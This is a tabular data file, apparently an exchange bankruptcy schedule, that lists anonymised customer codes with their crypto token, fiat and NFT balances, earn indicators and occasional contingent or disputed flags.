| 07372046 | | BAT[36.68289565], BRZ[2], BTC[0], ETH[.00000001], LINK[0], LTC[0], NFT (300334706093617785/Warriors 75th Anniversary Icon Edition Diamond #3134)[1], NFT (491976381869157382/Solamander #3514)[1], SHIB[3], SOL[0], TRX[2.011174], USD[0.63], USDT[0.00000001] | Yes | |
| 07372048 | | CUSDT[2], DOGE[0], SHIB[0], TRX[1.99866266], USD[39.69] | | |
| 07372049 | | USD[10.61] | Yes | |
| 07372051 | | USD[10.00] | | |
| 07372052 | | USD[10.00] | | |
| 07372053 | | CUSDT[22], TRX[1], USD[0.01] | | |
| 07372054 | | USD[10.00] | | |
| 07372056 | | USD[10.00] | | |
| 07372062 | | USD[10.00] | | |
| 07372064 | | USD[10.00] | | |
| 07372065 | | AVAX[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LINK[0], LTC[0], SHIB[1], SOL[0.02783056], SUSHI[0], UNI[0], USD[4.28] | Yes | |
| 07372066 | | SHIB[1], TRX[175.37114105], USD[0.00] | Yes | |
| 07372067 | | USD[10.00] | | |
| 07372068 | | DOGE[3.48912411], USD[0.00] | Yes | |
| 07372069 | | BRZ[2], BTC[.00151304], CUSDT[6], DOGE[1337.43996946], TRX[6], USD[270.81] | | |
| 07372070 | | USD[10.00] | | |
| 07372071 | | BTC[.00256867], ETH[.05712431], ETHW[.05712431], NFT (479468583824773843/Coachella x FTX Weekend 2 #14063)[1], USD[0.00] | | |
| 07372072 | | CUSDT[1], DOGE[127.10049279], TRX[1], USD[0.00] | | |
| 07372073 | | USD[10.00] | | |
| 07372074 | | AVAX[95.82935032], ETH[.00069759], ETHW[.00069759], USD[0.30] | | |
| 07372076 | | USD[10.00] | | |
| 07372077 | | BRZ[1], CUSDT[1], SUSHI[1.32771156], TRX[2], USD[0.00] | | |
| 07372079 | | USD[10.00] | | |
| 07372080 | | CUSDT[1], DOGE[1], SOL[45.40088277], TRX[1], USD[0.73] | | |
| 07372081 | | USD[10.00] | | |
| 07372084 | | BTC[.00271664], CUSDT[8], DOGE[515.0879667], ETH[.01428201], ETHW[.01428201], TRX[2], USD[0.00] | | |
| 07372088 | | CUSDT[7], DOGE[.00037093], LTC[.0000001], TRX[4], USD[0.02], USDT[0.00007231] | | |
| 07372089 | | USD[10.00] | | |
| 07372090 | | BTC[.00013353], DOGE[105.55749912], ETH[.00353717], ETHW[.00353717], SOL[.03122365], TRX[1], USD[0.00], USDT[.99361292] | | |
| 07372091 | | USD[10.00] | | |
| 07372092 | | TRX[1], USD[0.00] | | |
| 07372094 | | USD[6.61] | | |
| 07372095 | | USD[10.00] | | |
| 07372096 | | BRZ[2], BTC[0], CUSDT[8], DOGE[0], USD[0.00] | | |
| 07372097 | | BAT[1.0165555], BRZ[2], CUSDT[12], ETH[.07386468], ETHW[.07294812], GRT[3.16337617], SUSHI[1.10780774], TRX[8.00087675], USD[0.00], USDT[5.54700858] | Yes | |
| 07372098 | | TRX[2], USD[0.00], USDT[0.85607857] | | |
| 07372099 | | SUSHI[.58465521], USD[0.00] | | |
| 07372100 | | USD[10.00] | | |
| 07372101 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372102 | | USD[10.00] | | |
| 07372103 | | DOGE[51.78681441], USD[0.00] | Yes | |
| 07372104 | | DOGE[43.8314759], USD[0.00] | Yes | |
| 07372105 | | BTC[.000181], DOGE[.00003899], USD[0.00] | Yes | |
| 07372106 | | BAT[1], BTC[0], DOGE[2222.40188518], TRX[3], USD[0.00] | | |
| 07372107 | | LINK[.16907016], USD[0.00] | | |
| 07372108 | | USD[10.00] | | |
| 07372109 | | USD[10.00] | | |
| 07372110 | | BCH[.000685], DOGE[.995], GRT[668.206], SUSHI[.004], USD[0.00] | | |
| 07372111 | | BRZ[3], BTC[.05373013], DOGE[1], ETH[.28808175], ETHW[.28808175], GRT[1], TRX[3], USD[15.11] | | |
| 07372112 | | BAT[0], BCH[0], BRZ[1], BTC[0], CUSDT[7], DOGE[0], ETH[0], LINK[0], LTC[0], TRX[3], UNI[0], USD[0.00], USDT[0] | | |
| 07372113 | | USD[10.00] | | |
| 07372114 | | USD[10.00] | | |
| 07372120 | | USD[10.00] | | |
| 07372121 | | USD[10.00] | | |
| 07372127 | | GRT[1], USD[10.00] | | |
| 07372128 | | MATIC[6.7471515], USD[0.00] | | |
| 07372131 | | USD[10.00] | | |
| 07372132 | | BRZ[2.22118871], CUSDT[4], DOGE[24.94374946], ETH[.00133281], ETHW[.00131913], GRT[22.31432715], MATIC[26.34232593], SHIB[2874799.86935573], SOL[.16191566], TRX[.74306809], USD[0.03], USDT[0], YFI[.0000536] | Yes | |
| 07372134 | | USD[10.00] | | |
| 07372135 | | USD[10.00] | | |
| 07372137 | | USD[10.00] | | |
| 07372140 | | BTC[0], DOGE[.7482], USD[0.06] | | |
| 07372143 | | SHIB[1146.05232546], USD[0.00] | | |
| 07372144 | | USD[10.00] | | |
| 07372145 | | BRZ[0], DOGE[18.20877241], KSHIB[0], NFT (424040703972536660/FTX - Off The Grid Miami #1960)[1], SHIB[217445.11947471], USD[0.00], USDT[0] | Yes | |
| 07372146 | | BTC[.00946821], DOGE[1727.00723633], ETH[.07209596], ETHW[.07120046], GRT[1.00184648], SHIB[14527.79272537], TRX[1], USD[0.00] | Yes | |
| 07372147 | | USD[10.00] | | |
| 07372148 | | USD[10.00] | | |
| 07372149 | | USD[10.00] | | |
| 07372150 | | USD[11.03] | Yes | |
| 07372151 | | DOGE[3.15606792], NFT (390405790891894570/Mech #6637)[1], NFT (415436995048517665/Mech #4518)[1], NFT (417949548226330454/Mech #5785)[1], NFT (441929320015303209/Mech #3682)[1], NFT (477578549012586350/Mech #2369)[1], NFT (562876349587777902/Mech #7713)[1], SHIB[604306424.03998262], TRX[2], USD[0.00], USDT[0.00000001] | Yes | |
| 07372152 | | USD[10.00] | | |
| 07372153 | | USD[10.00] | | |
| 07372154 | | USD[0.00] | | |
| 07372155 | | BRZ[0.00003566], SOL[0], TRX[0], USD[0.00], USDT[0.00001046] | | |
| 07372157 | | AUD[0.00], BRZ[0], CAD[0.00], DOGE[4], GRT[208.56662829], LINK[3.52504719], TRX[1], USD[0.70] | | |
| 07372159 | | ETH[.00359862], ETHW[.00355758], USD[0.00] | Yes | |
| 07372160 | | TRX[1], USD[0.00] | | |
| 07372161 | | BRZ[1], CUSDT[1], SHIB[1], USD[0.00] | Yes | |
| 07372162 | | BRZ[2], BTC[.01141198], CUSDT[2], DOGE[2897.8815766], ETH[.25404179], ETHW[.25384923], LTC[4.62450894], SHIB[16948715.73958487], USD[0.00] | Yes | |
| 07372163 | | BTC[0], CUSDT[4], DOGE[0], ETH[0], USD[0.00] | | |
| 07372164 | | USD[10.00] | | |
| 07372165 | | USD[10.00] | | |
| 07372169 | | DOGE[.058], USD[0.00] | | |
| 07372170 | | USD[10.00] | | |
| 07372172 | | USD[10.00] | | |
| 07372174 | | USD[10.00] | | |
| 07372175 | | DOGE[143.12749379], USD[0.00] | Yes | |
| 07372176 | | BAT[1.0165555], BRZ[5.07952967], CUSDT[19], DOGE[6.16853578], TRX[14.63068486], USD[0.00], USDT[2.19906562] | Yes | |
| 07372179 | | BTC[0], DAI[0], EUR[0.00], USD[0.31], USDT[0] | | |
| 07372180 | | USD[11.08] | Yes | |
| 07372183 | | USD[10.00] | | |
| 07372184 | | BCH[.33639562], CUSDT[3], DOGE[789.44319196], ETH[.05915245], ETHW[.05841686], TRX[2757.04191727], USD[22.99] | Yes | |
| 07372186 | | USD[10.00] | | |
| 07372187 | | USD[10.00] | | |
| 07372188 | | CUSDT[3], DOGE[0], ETH[0], USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372189 | | BAT[2.11834575], BCH[0], BRZ[11.01837819], CUSDT[30], DOGE[5.01604109], ETH[0.00073185], ETHW[0.00072737], GRT[0], LTC[0.00001032], MATIC[0], SHIB[0], SOL[0.00001242], TRX[32.97465911], USD[0.92], USDT[0.00022331], YFI[0] | Yes | |
| 07372191 | | BAT[0], BCH[0], BRZ[1], BTC[0], DOGE[2], TRX[0], USD[0.00] | | |
| 07372192 | | USD[10.00] | | |
| 07372193 | | AUD[0.00], BAT[2.05607752], BRZ[2], CUSDT[15837.09156702], DOGE[6850.22288512], TRX[3009.19845574], USD[0.00] | Yes | |
| 07372194 | | USD[2000.00], USDT[0] | | |
| 07372195 | | USD[10.00] | | |
| 07372196 | | BTC[0], GRT[0], USD[0.00], USDT[0] | | |
| 07372197 | | USD[11.09] | Yes | |
| 07372198 | | CUSDT[1], DOGE[1], GRT[1], TRX[1], USD[0.00] | | |
| 07372199 | | USD[10.00] | | |
| 07372202 | | DOGE[1], ETH[.01479095], ETHW[.01479095], USD[10.00] | | |
| 07372203 | | UNI[.40481763], USD[0.00] | | |
| 07372204 | | BAT[.08233683], BRZ[3], CUSDT[2.00039502], DOGE[5.34697845], ETH[.1976024], ETHW[.1973918], GRT[223.96757263], SHIB[6], SOL[6.47988348], TRX[14.00753502], USD[553.08], USDT[0.01076066] | Yes | |
| 07372205 | | NFT (34848378178068338/Entrance Voucher #3060)[1] | | |
| 07372206 | | USD[10.00] | | |
| 07372207 | | BRZ[1], CUSDT[3], TRX[4], USD[0.00] | | |
| 07372208 | | TRX[140.71228558], USD[10.00] | | |
| 07372209 | | GRT[9.55416516], USD[0.00] | Yes | |
| 07372210 | | DOGE[.00276254], SHIB[2], USD[0.00] | | |
| 07372214 | | SHIB[80300081.95480677], TRX[1], USD[0.00] | Yes | |
| 07372215 | | BAT[2], BRZ[3], CUSDT[9], DOGE[4838.59434327], ETH[1.04597264], ETHW[1.04597264], TRX[2], USD[0.00] | | |
| 07372216 | | AAVE[0], BCH[0], BRZ[3], BTC[0], CUSDT[11], DOGE[4.04164975], ETH[0], ETHW[0], GRT[1], LINK[1.10077112], SOL[0], TRX[15.80818749], USD[0.01], USDT[3.30534622] | Yes | |
| 07372217 | | BTC[.00089191], CUSDT[1], DOGE[4163.72332889], USD[0.00] | | |
| 07372218 | | BAT[1.0165555], BRZ[12.02679276], CUSDT[32], DOGE[9.44047557], ETH[0], GRT[2.00367791], SHIB[2], SOL[24.05986392], SUSHI[0], TRX[9], USD[391.02], USDT[4.34156146] | Yes | |
| 07372220 | | USD[0.01] | | |
| 07372221 | | USD[0.01] | | |
| 07372223 | | USD[10.00] | | |
| 07372225 | | USD[10.00] | | |
| 07372226 | | CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07372227 | | USD[4.09] | | |
| 07372228 | | CUSDT[3], DOGE[1], USD[0.00], USDT[1] | | |
| 07372229 | | USD[10.00] | | |
| 07372231 | | USD[10.00] | | |
| 07372232 | | BRZ[1], CUSDT[7], TRX[1], USD[0.50] | | |
| 07372233 | | USD[10.00] | | |
| 07372234 | | GRT[4.90693419], USD[0.00] | | |
| 07372236 | | USD[10.00] | | |
| 07372237 | | AAVE[0], DOGE[0], ETH[0], ETHW[0], EUR[0.00], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07372238 | | DOGE[1], TRX[59.40178129], USD[0.00] | | |
| 07372240 | | BAT[1], BRZ[1], CUSDT[6], DOGE[.47268522], USD[0.00] | | |
| 07372241 | | BAT[3.0186202], BRZ[1], CUSDT[3], DOGE[4.00252133], GRT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07372242 | | BF_POINT[100], DOGE[4], GRT[2], TRX[1], USD[0.00] | | |
| 07372243 | | DOGE[4], TRX[1], USD[0.00] | | |
| 07372244 | | CUSDT[1], TRX[.00003364], USD[0.00] | | |
| 07372245 | | USD[10.00] | | |
| 07372246 | | KSHIB[443.70119564], USD[0.00] | | |
| 07372247 | | USD[10.00] | | |
| 07372249 | | BTC[.00003929], ETH[0.01096975], ETHW[0.01096975], NFT (28967005891702402/FTX Test Pack 1 #6)[1], NFT (295969016040052057/BabyBlob #75)[1], NFT (304752475266291802/SBF Hair & Signature #5 #2)[1], NFT (310290213152477708/Solninjas #6589)[1], NFT (330187604390629322/Cutie Kittens #21)[1], NFT (332861781652324670/FTX Test Pack 1 #4)[1], NFT (340996439735093300/SBF Hair & Signature #4 #52)[1], NFT (341804623347155142/Little Rocks #767)[1], NFT (345323772946581671/Coachella x FTX Weekend 1)[1], NFT (349243159061735669/Night Light #527 (Redeemed))[1], NFT (378763312690735412/Aku World: Dream)[1], NFT (380032912348733729/BabyBlob #262)[1], NFT (391222172375636368/BabyBlob #261)[1], NFT (392721585125067040/Test NFT 001 #2)[1], NFT (422447982881748169/SBF Hair & Signature #6 #2)[1], NFT (425811732658232212/Series 1: Wizards #55)[1], NFT (431533450980583498/SBF Hair & Signature #3 #23)[1], NFT (431874882505588771/NFT BZL 2021)[1], NFT (450459630803507628/Series 1: Wizards #56)[1], NFT (467411195213998290/BabyBlob #27)[1], NFT (474107040699285152/DWB TEST)[1], NFT (474477365591323606/DWB Avatar 9)[1], NFT (478837816084188056/SBF Hair & Signature #4 #23)[1], NFT (485995992866634279/Test NFT 001)[1], NFT (487531097123415003/Jolly Dolphins Test #5)[1], NFT (494954717784632014/Jolly Dolphins Test #4)[1], NFT (501027674235295806/BabyBlob #263)[1], NFT (536732989340711359/Jolly Dolphins Test #2)[1], NFT (537916992994692080/The Hill by FTX #1921)[1], NFT (569610766137581687/Reflection '12 #88)[1], SOL[.58690392], SUSHI[.4916], UNI[.0011], USD[6.48] | | |
| 07372250 | | UNI[0], USD[0.00], USDT[0] | | |
| 07372251 | | USD[0.00] | | |
| 07372253 | | USD[10.00] | | |
| 07372254 | | DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372255 | | BAT[.00995037], BRZ[6], CUSDT[11.72362056], GRT[1.00007606], LINK[.00007629], LTC[.00000001], TRX[5.00011475], USD[0.01], USDT[1] | | |
| 07372256 | | USD[10.00] | | |
| 07372257 | | USD[10.00] | | |
| 07372258 | | BRZ[1], CUSDT[2], DOGE[3], SHIB[4], TRX[1], USD[0.00], USDT[1] | | |
| 07372259 | | CUSDT[1], SUSHI[68.03537374], USD[10.00] | | |
| 07372260 | | BTC[0.02830089], DOGE[0.00003923], SHIB[1], USD[0.00] | Yes | |
| 07372261 | | USD[11.06] | Yes | |
| 07372262 | | BRZ[1], CUSDT[2], ETHW[.91584866], GRT[1], TRX[7908.38593267], USD[0.00] | | |
| 07372263 | | ALGO[494.505], AVAX[20.4795], BTC[0.00007968], ETH[0], LINK[28.5183], NEAR[64.4355], SOL[4.91568], USD[3.17], USDT[.526] | | |
| 07372264 | | USD[0.00] | Yes | |
| 07372265 | | USD[10.00] | | |
| 07372266 | | USD[10.00] | | |
| 07372268 | | BF_POINT[700], BRZ[2], DOGE[2], SHIB[2], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07372269 | | CUSDT[1], DOGE[1], ETH[.02796768], ETHW[.02762395], USD[0.00] | Yes | |
| 07372270 | | USD[10.00] | | |
| 07372271 | | USD[10.00] | | |
| 07372272 | | BRZ[1], BTC[.02056636], CUSDT[4], DOGE[453.97050637], ETH[.22793675], ETHW[.22793675], TRX[1671.26396025], USD[0.00] | | |
| 07372273 | | BRZ[1], CUSDT[17], DOGE[4], GRT[2], USD[0.00] | | |
| 07372274 | | USD[100.00] | | |
| 07372275 | | DOGE[132.71893315], USD[0.00] | | |
| 07372276 | | USD[10.00] | | |
| 07372277 | | USD[10.00] | | |
| 07372278 | | USD[10.00] | | |
| 07372279 | | CUSDT[1], DOGE[1], LINK[1.00364108], TRX[.91593528], USD[0.00] | | |
| 07372280 | | USD[10.00] | | |
| 07372281 | | USD[0.00] | Yes | |
| 07372282 | | USD[10.00] | | |
| 07372283 | | SHIB[1], USD[0.01] | | |
| 07372284 | | USD[0.00], YFI[.00070891] | Yes | |
| 07372285 | | USD[10.00] | | |
| 07372287 | | BAT[1.01655549], CUSDT[3], DOGE[0], GRT[1.00498957], LINK[0], USD[183.81] | Yes | |
| 07372288 | | USD[0.01] | | |
| 07372290 | | USD[0.03] | | |
| 07372291 | | USD[10.00] | | |
| 07372292 | | CUSDT[1], DOGE[1265.93593356], SOL[2.37302363], TRX[160.27969275], USD[2.75] | | |
| 07372293 | | BAT[189.81917352], BRZ[3], BTC[.00680659], CUSDT[7], DOGE[4.04729088], ETH[.11352105], ETHW[.11240375], GRT[223.56412573], LINK[2.63375862], TRX[2], USD[12.25] | Yes | |
| 07372295 | | DOGE[34.76113779], USD[0.00] | | |
| 07372296 | | DOGE[1], ETH[0], LTC[0], MATIC[0], USD[0.00], USDT[0] | Yes | |
| 07372297 | | SOL[0], USD[0.00] | Yes | |
| 07372299 | | USD[10.00] | | |
| 07372301 | | BTC[.00025287], USD[10.00] | | |
| 07372302 | | USD[10.00] | | |
| 07372303 | | USD[10.00] | | |
| 07372305 | | USD[10.00] | | |
| 07372306 | | USD[10.00] | | |
| 07372307 | | DOGE[213.51687344], USD[0.00] | Yes | |
| 07372308 | | BRZ[1], CUSDT[2], SUSHI[1], USD[0.00] | | |
| 07372309 | | ETH[0], USD[0.55] | | |
| 07372310 | | SHIB[1], USD[0.00], USDT[0], YFI[.05140313] | Yes | |
| 07372311 | | DOGE[0], USD[0.00] | | |
| 07372312 | | USD[10.00] | | |
| 07372313 | | DOGE[0.00006106], USD[0.00] | | |
| 07372315 | | USD[10.00] | | |
| 07372316 | | TRX[1], USD[7.25] | | |
| 07372318 | | USD[10.00] | | |
| 07372321 | | USD[10.00] | | |
| 07372322 | | USD[0.00], USDT[0] | Yes | |
| 07372323 | | LTC[.04331397], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372324 | | BRZ[1], CUSDT[5], TRX[1], USD[0.00] | | |
| 07372325 | | DOGE[213.22317364], USD[0.00] | Yes | |
| 07372326 | | DOGE[3582.34291769], USD[0.00], USDT[0] | Yes | |
| 07372327 | | USD[10.00] | | |
| 07372328 | | DOGE[42.66751501], USD[0.00] | | |
| 07372329 | | BTC[0], CUSDT[2], DOGE[1], USD[0.00], USDT[0.00000019] | | |
| 07372330 | | USD[0.00] | | |
| 07372331 | | USD[0.00] | | |
| 07372332 | | AAVE[0], BAT[1.00001235], BRZ[2], BTC[0], CUSDT[6], DOGE[11.167582], ETH[0], GRT[6.09276137], NFT (29184526988476945O/Saudi Arabia Ticket Stub #1774)[1], SHIB[7], SOL[0], TRX[5], USD[0.00], USDT[0], YF[0] | Yes | |
| 07372333 | | BAT[11.16495556], DOGE[.006969], ETH[.00791633], ETHW[.00791633], TRX[172.55692609], UNI[.24683824], USD[0.00] | | |
| 07372334 | | CUSDT[4], DOGE[0], SUSHI[0], USD[0.00] | Yes | |
| 07372335 | | CUSDT[2], DOGE[6], TRX[1], USD[0.00] | | |
| 07372336 | | USD[10.00] | | |
| 07372337 | | ALGO[.00183506], AVAX[.00000917], ETH[0.00000001], ETHW[0.00101696], GRT[.00229573], LINK[.00009216], NEAR[.00009173], SOL[.0000412], SUSHI[.00045812], TRX[0.79596974], UNI[.00009152], USD[0.00], USDT[0.02875602] | Yes | |
| 07372338 | | USD[7.63] | Yes | |
| 07372339 | | CUSDT[5], TRX[2], USD[0.00] | | |
| 07372340 | | GRT[4.52605081], USD[0.00] | | |
| 07372341 | | BAT[1], CUSDT[3], DOGE[0], GRT[1.00003173], NFT (417781216835112899/Entrance Voucher #4165)[1], SHIB[1], SOL[3.54805906], TRX[0], USD[0.00], USDT[1] | | |
| 07372342 | | USD[10.00] | | |
| 07372344 | | BAT[.00292138], DAI[.01828726], NFT (427812088592709111/FTX - Off The Grid Miami #4848)[1], TRX[4415.32843431], USD[0.00], USDT[795.21057486] | Yes | |
| 07372345 | | BTC[.00000001], CUSDT[7], SHIB[0], TRX[3], USD[0.00] | | |
| 07372346 | | USD[0.00] | | |
| 07372347 | | TRX[206.20999322], USD[0.00] | | |
| 07372350 | | USD[10.00] | | |
| 07372353 | | USD[0.00] | | |
| 07372354 | | USD[10.00] | | |
| 07372355 | | CUSDT[2], DOGE[0], GRT[1], TRX[4], USD[0.00] | | |
| 07372356 | | CUSDT[2], DOGE[158.43996707], USD[0.00] | Yes | |
| 07372357 | | DOGE[.02516962], TRX[1], USD[0.44] | | |
| 07372358 | | CUSDT[1], ETH[.04949947], ETHW[.04888387], TRX[1], USD[0.00] | Yes | |
| 07372359 | | USD[10.00] | | |
| 07372360 | | BRZ[1], CUSDT[3], DOGE[725.12008283], USD[0.00] | | |
| 07372361 | | ETHW[.00000323], SHIB[5], SOL[0], USD[2370.61], USDT[0.00000001] | Yes | |
| 07372362 | | USD[10.00] | | |
| 07372363 | | DOGE[1], SOL[8.0180748], TRX[220.82801229], USD[0.00] | | |
| 07372364 | | USD[0.00] | | |
| 07372365 | | BTC[.00175509], USD[0.00] | | |
| 07372366 | | DOGE[0], SUSHI[0], USD[0.05], YFI[0] | | |
| 07372368 | | BAT[1], BRZ[2], CUSDT[13], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07372369 | | CUSDT[1], DOGE[0], SHIB[1], SOL[0], USD[0.00] | Yes | |
| 07372371 | | USD[10.00] | | |
| 07372372 | | BAT[0], BRZ[2], BTC[.0000021], CUSDT[3], DOGE[2], ETH[0], ETHW[0], GRT[1.00293475], MATIC[7.42500710], SHIB[2], SOL[0], TRX[2], UNI[0], USD[0.01], USDT[0.00167812] | Yes | |
| 07372373 | | CUSDT[1], DOGE[129.08870466], USD[0.00] | | |
| 07372374 | | USD[10.00] | | |
| 07372375 | | USD[10.00] | | |
| 07372377 | | CUSDT[2], DOGE[407.65347576], USD[0.00] | Yes | |
| 07372378 | | USD[10.00] | | |
| 07372379 | | DOGE[0], LTC[0], USD[0.00], USDT[0] | | |
| 07372380 | | DOGE[1], SHIB[3574209.83205977], USD[0.00] | Yes | |
| 07372381 | | USD[0.01] | | |
| 07372382 | | DOGE[33.47600247], USD[0.00] | | |
| 07372383 | | BTC[.00003722], DOGE[0], ETH[.00000029], ETHW[.00000029], USD[0.00] | Yes | |
| 07372384 | | BTC[.00013803], USD[0.00] | | |
| 07372385 | | TRX[158.48882804], USD[0.00] | | |
| 07372386 | | USD[10.00] | | |
| 07372387 | | BAT[1], BRZ[1], BTC[.00396158], CUSDT[2], DOGE[2693.56905285], SOL[2.59187475], TRX[2], USD[0.66] | | |
| 07372388 | | BTC[.0000002], USD[0.00] | | |
| 07372389 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372390 | | USD[10.00] | | |
| 07372392 | | USD[10.00] | | |
| 07372393 | | USD[10.00] | | |
| 07372394 | | CUSDT[5], DOGE[.00001654], TRX[.00003404], USD[0.68] | | |
| 07372395 | | USD[10.00] | | |
| 07372396 | | USD[10.00] | | |
| 07372397 | | USD[10.00] | | |
| 07372398 | | BRZ[2.00097897], CUSDT[1], TRX[2], USD[0.00] | | |
| 07372399 | | BTC[.00021035], CUSDT[1], USD[0.00] | | |
| 07372400 | | USD[10.00] | | |
| 07372401 | | ETH[.0054673], ETHW[.0054673], USD[0.00] | | |
| 07372402 | | ETH[.00491098], ETHW[.00491098], USD[0.00] | | |
| 07372404 | | DOGE[2], GRT[1], LINK[.00714392], MATIC[.02374279], SHIB[2], TRX[3], USD[0.00], USDT[0.04561728] | Yes | |
| 07372405 | | CUSDT[1], DOGE[112.04995867], TRX[33.8466293], USD[0.57] | Yes | |
| 07372406 | | USD[10.00] | | |
| 07372407 | | USD[10.00] | | |
| 07372408 | | CUSDT[1], ETH[0], ETHW[0], TRX[1], USD[10.00] | | |
| 07372409 | | DOGE[2], USD[0.01] | | |
| 07372410 | | BRZ[2], CUSDT[3], DOGE[.00009388], TRX[0.00046304], USD[0.00] | | |
| 07372412 | | DOGE[2.89556112], USD[0.00] | | |
| 07372413 | | USD[10.00] | | |
| 07372414 | | SUSHI[.4575] | | |
| 07372415 | Contingent, Disputed | USD[0.00] | | |
| 07372417 | | BRZ[1], DOGE[.25494908], USD[0.01] | | |
| 07372418 | | BAT[2.08719861], BRZ[2], CUSDT[36], DOGE[0], USD[0.00] | Yes | |
| 07372419 | | USD[10.00] | | |
| 07372420 | | BRZ[1], CUSDT[2], DOGE[9], TRX[2], USD[0.01] | | |
| 07372421 | | CUSDT[2], TRX[1.00462053], USD[0.01] | Yes | |
| 07372422 | | USD[10.00] | | |
| 07372423 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07372424 | | BTC[0.00005168], ETH[.00089349], ETHW[0], GRT[1], NFT (431219080536069596/Microphone #6)[1], SHIB[1], TRX[3], USD[0.01], USDT[2.00597862] | Yes | |
| 07372425 | | CUSDT[1], DOGE[11020.6320825], ETH[.00633549], ETHW[.00633549], GRT[1], SHIB[1], TRX[949.22506853], USD[0.95] | | |
| 07372427 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07372428 | | USD[10.00] | | |
| 07372429 | | USD[10.00] | | |
| 07372430 | | BRZ[1], DOGE[.54185296], USD[0.53] | | |
| 07372431 | | USD[10.00] | | |
| 07372432 | | BAT[43.86210101], CUSDT[2], DOGE[1105.56900544], TRX[1], USD[0.00] | Yes | |
| 07372433 | | CUSDT[3], USD[0.01] | | |
| 07372434 | | BRZ[1], CUSDT[23], DOGE[10.52784753], SOL[0], TRX[5], USD[5.20], USDT[0.00000062] | Yes | |
| 07372435 | | DOGE[0], GRT[.0082841], USD[0.00] | Yes | |
| 07372437 | | USD[10.00] | | |
| 07372438 | | UNI[.48024621], USD[0.00] | | |
| 07372439 | | USD[0.04] | | |
| 07372440 | | BTC[0], SUSHI[.1123806], USD[0.00] | Yes | |
| 07372441 | | USD[10.00] | | |
| 07372442 | | USD[10.00] | | |
| 07372443 | | BTC[.00016343], USD[0.00] | Yes | |
| 07372444 | | MATIC[8.77426747], USD[0.00] | | |
| 07372445 | | USD[10.00] | | |
| 07372446 | | BTC[.00001], DOGE[.426], ETH[.000736], ETHW[.000736], LTC[.00952], USD[185.49] | | |
| 07372447 | | TRX[191.80803238], USD[0.00] | | |
| 07372448 | | BAT[1], DOGE[3284.66831430], GRT[1], TRX[6907.84137877], USD[0.00], USDT[1] | | |
| 07372450 | | USD[10.00] | | |
| 07372451 | | CUSDT[1], DOGE[24797.01779074], TRX[2234.57604167], USD[0.00] | | |
| 07372452 | | BCH[0], BTC[0], CUSDT[0], ETH[0.00629553], ETHW[0.00629553], SHIB[2], SOL[0], USD[0.00] | | |
| 07372453 | | BF_POINT[500], CUSDT[1], DOGE[265.60613665], SHIB[4151622.87437243], USD[0.00] | Yes | |
| 07372455 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07372457 | | CUSDT[1], SHIB[6664338.26714906], TRX[1], USD[0.00] | Yes | |
| 07372458 | | USD[10.00] | | |
| 07372459 | | SOL[.00062774], USD[0.10] | Yes | |
| 07372460 | | CUSDT[1], TRX[216.14162982], USD[0.00] | | |
| 07372461 | | BTC[0], USD[0.00], USDT[0] | | |
| 07372462 | | USD[10.00] | | |
| 07372463 | | USD[10.00] | | |
| 07372465 | | BRZ[1], CUSDT[1], DOGE[.35216859], USD[0.00] | | |
| 07372466 | | USD[10.00] | | |
| 07372467 | | AUD[0.00], DOGE[28.45165154], USD[0.01], USDT[0] | | |
| 07372468 | | USD[10.00] | | |
| 07372469 | | BCH[0], BTC[0], CUSDT[3], DOGE[113.91547004], ETH[0], NFT (291924148113053138/Entrance Voucher #2804)[1], TRX[3], USD[0.00] | | |
| 07372470 | | USD[10.00] | | |
| 07372474 | | USD[10.00] | | |
| 07372475 | | TRX[689.487326], USD[10.00] | | |
| 07372476 | | BAT[8.35081325], DOGE[1], TRX[95.53120316], USD[0.00] | | |
| 07372477 | | DOGE[126.01584851], USD[0.00] | | |
| 07372478 | | USD[10.00] | | |
| 07372480 | | SOL[.00002669], TRX[2], USD[0.00] | | |
| 07372481 | | DOGE[0], TRX[0], USD[0.01] | | |
| 07372482 | | USD[10.00] | | |
| 07372483 | | CUSDT[2], DOGE[1], TRX[.03816799], USD[0.00] | Yes | |
| 07372484 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07372485 | | CUSDT[1], DOGE[723.21658278], ETH[.03102578], ETHW[.03102578], SHIB[1], USD[0.00] | | |
| 07372486 | | USD[0.00] | | |
| 07372487 | | USD[0.00] | | |
| 07372488 | | USD[10.00] | | |
| 07372489 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07372490 | | DOGE[0], ETH[0], SOL[0.00000002], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07372491 | | DOGE[138.97853004], USD[0.00] | | |
| 07372492 | | CUSDT[9.37187089], USD[0.00] | | |
| 07372493 | | USD[10.00] | | |
| 07372494 | | USD[10.00] | | |
| 07372495 | | USD[10.00] | | |
| 07372496 | | DOGE[128.24735117], USD[0.00] | | |
